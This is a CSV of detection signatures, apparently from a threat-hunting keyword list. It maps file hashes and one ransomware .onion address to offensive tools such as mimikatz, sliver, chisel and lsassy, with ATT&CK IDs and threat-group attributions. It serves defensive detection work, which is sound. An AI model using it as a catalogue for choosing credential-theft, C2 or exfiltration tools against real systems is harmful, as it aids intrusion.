"*478e0f90d2d51a17f5ffce9dda75339848ef2bd5b8109b6695104a9ae8b71bc1*",".{0,1000}478e0f90d2d51a17f5ffce9dda75339848ef2bd5b8109b6695104a9ae8b71bc1.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","https://www.virustotal.com/gui/file-analysis/ZTNjYTA2MmQ2YzhiYWUwMjc4Y2U5YmIwNmVhMDVkNDA6MTcyNDUyNTI4Ng==","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","25862"
"*47a09946abb82f902d44af7c47877cb53e146d37d3701ae6b1afec149737311a*",".{0,1000}47a09946abb82f902d44af7c47877cb53e146d37d3701ae6b1afec149737311a.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25865"
"*47a825e8e986071566b2bd72e956bc88f422348ebe17b4e142e7c6a1a1eb4a1f*",".{0,1000}47a825e8e986071566b2bd72e956bc88f422348ebe17b4e142e7c6a1a1eb4a1f.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","25868"
"*47ab74088173b85e9b5aee8a8597ada4ebd3ef4bbe645ecc45a52392be9b94b6*",".{0,1000}47ab74088173b85e9b5aee8a8597ada4ebd3ef4bbe645ecc45a52392be9b94b6.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","25869"
"*47ab8ed046a22fb188930af037aa05a7f74e3e39331d56c32d736589f7ac78b2*",".{0,1000}47ab8ed046a22fb188930af037aa05a7f74e3e39331d56c32d736589f7ac78b2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25871"
"*47adbdef1e6009d49324930f31963210ebaf0f9a3e8cb293f027d81c1aedc309*",".{0,1000}47adbdef1e6009d49324930f31963210ebaf0f9a3e8cb293f027d81c1aedc309.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","25872"
"*47c92847c6341aa56ef4979a795844c089a6e87696eeebab2d0411e03b51d79b*",".{0,1000}47c92847c6341aa56ef4979a795844c089a6e87696eeebab2d0411e03b51d79b.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25875"
"*47c9eff8142490a2c341701aab7aaebc355eed1540eed534a8317dd1e65614b2*",".{0,1000}47c9eff8142490a2c341701aab7aaebc355eed1540eed534a8317dd1e65614b2.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","25876"
"*47d121087c05568fe90a25ef921f9e35d40bc6bec969e33e75337fc9b580f0e8*",".{0,1000}47d121087c05568fe90a25ef921f9e35d40bc6bec969e33e75337fc9b580f0e8.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","#filehash","N/A","10","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","25877"
"*47d75f99421719d4125b51f91bf7d622133bce0528e5e26051366f6a588d358d*",".{0,1000}47d75f99421719d4125b51f91bf7d622133bce0528e5e26051366f6a588d358d.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25879"
"*47d75f99421719d4125b51f91bf7d622133bce0528e5e26051366f6a588d358d*",".{0,1000}47d75f99421719d4125b51f91bf7d622133bce0528e5e26051366f6a588d358d.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25880"
"*47d75f99421719d4125b51f91bf7d622133bce0528e5e26051366f6a588d358d*",".{0,1000}47d75f99421719d4125b51f91bf7d622133bce0528e5e26051366f6a588d358d.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25881"
"*47eb5cfc14028872dab22f2202be7f5df00288463ca798191286ddb99bf7b34f*",".{0,1000}47eb5cfc14028872dab22f2202be7f5df00288463ca798191286ddb99bf7b34f.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25886"
"*47f24f8e55ef98aca7f72bebb5867e8935f17fc7b1d5af8d6a76934009c27635*",".{0,1000}47f24f8e55ef98aca7f72bebb5867e8935f17fc7b1d5af8d6a76934009c27635.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","25888"
"*47f65f47bf82b419bd5cc4ef4dc6d538cad4e5006aad4c557d242e31ab492ba4*",".{0,1000}47f65f47bf82b419bd5cc4ef4dc6d538cad4e5006aad4c557d242e31ab492ba4.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","25889"
"*47fa63cb5af6b062d101ab4a8d9885c089c3ab238fc5e9e11a26680f45e5250a*",".{0,1000}47fa63cb5af6b062d101ab4a8d9885c089c3ab238fc5e9e11a26680f45e5250a.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","25890"
"*47fcecd53c11bc648d564c02592617a6ce400d59c94167eefc9a5f7d86cb645c*",".{0,1000}47fcecd53c11bc648d564c02592617a6ce400d59c94167eefc9a5f7d86cb645c.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","25891"
"*47h4pwve4scndaneljfnxdhzoulgsyfzbgayyonbwztfz74gsdprz5qd.onion*",".{0,1000}47h4pwve4scndaneljfnxdhzoulgsyfzbgayyonbwztfz74gsdprz5qd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","25893"
"*4802db51ec51c17bea27c97d871a840211f6d74b88eb9494b00b99a28957142a*",".{0,1000}4802db51ec51c17bea27c97d871a840211f6d74b88eb9494b00b99a28957142a.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","25894"
"*48039def2e245f13ff409707a8b0018a402c58ec413ff81f947339203a615057*",".{0,1000}48039def2e245f13ff409707a8b0018a402c58ec413ff81f947339203a615057.{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","0","#filehash","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","25895"
"*4808ad1202bb14375f19929cb389433ffca4b27eaba4490da262a48f57b5af64*",".{0,1000}4808ad1202bb14375f19929cb389433ffca4b27eaba4490da262a48f57b5af64.{0,1000}","offensive_tool_keyword","PowerBreach","PowerBreach is a backdoor toolkit that aims to provide the user a wide variety of methods to backdoor a system","T1055 - T1203 - T1105 - T1202 - T1027 - T1059 - T1070","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/PowerShellEmpire/PowerTools","1","0","#filehash","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","25896"
"*4810c782a8fe964512f08db91e8107e9af29edab*",".{0,1000}4810c782a8fe964512f08db91e8107e9af29edab.{0,1000}","offensive_tool_keyword","PowerLess","PowerShell-based modular backdoor that has been used by Magic Hound group","T1560 - T1217 - T1059.001 - T1005 - T1074.001 - T1140 - T1573 - T1105 - T1056.001","TA0011 - TA0009 - TA0010 - TA0005 - TA0002 - TA0006","N/A","Magic Hound","Malware","https://gist.github.com/farzinenddo/bb1f1ecb56aa9326abc7b47fc99e588e","1","0","#filehash","N/A","10","4","N/A","N/A","N/A","N/A","25898"
"*481dd18cb726fa8637461072ba5149f553ba72ff68bc0b28d98bc3bee0c5488d*",".{0,1000}481dd18cb726fa8637461072ba5149f553ba72ff68bc0b28d98bc3bee0c5488d.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","25901"
"*482002c785db1a3432ec214464a19042a3f36a21e5617a9901a0eae9f04451f1*",".{0,1000}482002c785db1a3432ec214464a19042a3f36a21e5617a9901a0eae9f04451f1.{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","0","#filehash","N/A","10","10","103","10","2025-03-27T12:47:34Z","2024-04-11T12:17:22Z","25903"
"*48213dd6196f88e665f7ca5d9e139f56f9c54921ae9703a329f76b08ec364d3d*",".{0,1000}48213dd6196f88e665f7ca5d9e139f56f9c54921ae9703a329f76b08ec364d3d.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","25904"
"*48213dd6196f88e665f7ca5d9e139f56f9c54921ae9703a329f76b08ec364d3d*",".{0,1000}48213dd6196f88e665f7ca5d9e139f56f9c54921ae9703a329f76b08ec364d3d.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","25905"
"*482882bd61c051edd33a9b31d03430d6090bcf031102779c66c7adfc1790d7ee*",".{0,1000}482882bd61c051edd33a9b31d03430d6090bcf031102779c66c7adfc1790d7ee.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25907"
"*4830297df839add17bdea8daa07deea8a8b1ff156a68dfeae1e7ae420270191f*",".{0,1000}4830297df839add17bdea8daa07deea8a8b1ff156a68dfeae1e7ae420270191f.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","#filehash","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","25910"
"*48305b78df432d4e3b15a32a516fab118add29b2c12a49806745ea92f2a98b1b*",".{0,1000}48305b78df432d4e3b15a32a516fab118add29b2c12a49806745ea92f2a98b1b.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","25911"
"*48356997a701c96f9b96b1d2dfc20280771a112f2d03b0266abb12e24562456c*",".{0,1000}48356997a701c96f9b96b1d2dfc20280771a112f2d03b0266abb12e24562456c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25912"
"*48359bfb6692ea45f075188b2b244fc8fcec4ef7e80d2c2eecae90d5c9cdd04b*",".{0,1000}48359bfb6692ea45f075188b2b244fc8fcec4ef7e80d2c2eecae90d5c9cdd04b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","25913"
"*4841539dd633e3c38767c9098481406113d80aba6c23e5326f30e5328ac30234*",".{0,1000}4841539dd633e3c38767c9098481406113d80aba6c23e5326f30e5328ac30234.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","25914"
"*484703070e9da920db68980b7278e8cbafdfd69e3019772253f70e4d425d0a35*",".{0,1000}484703070e9da920db68980b7278e8cbafdfd69e3019772253f70e4d425d0a35.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25915"
"*4848f468fc1f6b5c933d83be4e9295cf6af8eb74b789fdf0a6f116c7444808b2*",".{0,1000}4848f468fc1f6b5c933d83be4e9295cf6af8eb74b789fdf0a6f116c7444808b2.{0,1000}","offensive_tool_keyword","SharpExShell","SharpExShell automates the DCOM lateral movment technique which abuses ActivateMicrosoftApp method of Excel application","T1021.003 - T1218.007 - T1127.001","TA0008 - TA0009 - TA0005","N/A","N/A","Lateral Movement","https://github.com/grayhatkiller/SharpExShell","1","0","#filehash","N/A","8","1","70","15","2024-05-01T23:17:25Z","2023-10-30T18:16:41Z","25916"
"*484e5f88fb6e76e88b542f032e1ff0b693e16f67ca9810cbc4de4d1314f4420d*",".{0,1000}484e5f88fb6e76e88b542f032e1ff0b693e16f67ca9810cbc4de4d1314f4420d.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","25918"
"*484f12b93ca5f088c3a0db9f31106c2fc855642292fc867a512df8f6a8826d09*",".{0,1000}484f12b93ca5f088c3a0db9f31106c2fc855642292fc867a512df8f6a8826d09.{0,1000}","offensive_tool_keyword","ROADtoken","Abusing Azure AD SSO with the Primary Refresh Token - ROADtoken is a tool that uses the BrowserCore.exe binary to obtain a cookie that can be used with SSO and Azure AD","T1557 - T1078 - T1071.001 - T1552.001","TA0006 ","N/A","N/A","Credential Access","https://github.com/dirkjanm/ROADtoken","1","0","#filehash","N/A","7","1","89","17","2020-09-30T16:18:47Z","2020-07-21T12:42:14Z","25919"
"*485fc17f62c8fddffc7e65f7dac7675eb02912abc6930260caa3b3aa9613b3d0*",".{0,1000}485fc17f62c8fddffc7e65f7dac7675eb02912abc6930260caa3b3aa9613b3d0.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","25921"
"*4860280fe3039b1f65dad29dbcbb674c6f41004c34e99d382b824b4004aacdd0*",".{0,1000}4860280fe3039b1f65dad29dbcbb674c6f41004c34e99d382b824b4004aacdd0.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","#filehash","N/A","10","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","25922"
"*486d59732d2c346aa2cbaffff0d290b0e5fc0a967e0878240fd29df65525dfc8*",".{0,1000}486d59732d2c346aa2cbaffff0d290b0e5fc0a967e0878240fd29df65525dfc8.{0,1000}","offensive_tool_keyword","Offensive-Netsh-Helper","Maintain Windows Persistence with an evil Netshell Helper DLL","T1174 - T1055.011 - T1546.013 - T1574.002 - T1105","TA0003 ","N/A","N/A","Persistence","https://github.com/rtcrowley/Offensive-Netsh-Helper","1","0","#filehash","N/A","9","1","12","5","2018-07-28T02:12:09Z","2018-07-25T22:49:20Z","25924"
"*4870b4163315fa666dea8be03176d76aa215fe33187db45aca984e07b25ca827*",".{0,1000}4870b4163315fa666dea8be03176d76aa215fe33187db45aca984e07b25ca827.{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","0","#filehash","N/A","9","1","79","7","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z","25925"
"*48736ecb605040b194fb7064d4bb621c38713fd3555a4f09f759ee45e81a2103*",".{0,1000}48736ecb605040b194fb7064d4bb621c38713fd3555a4f09f759ee45e81a2103.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25926"
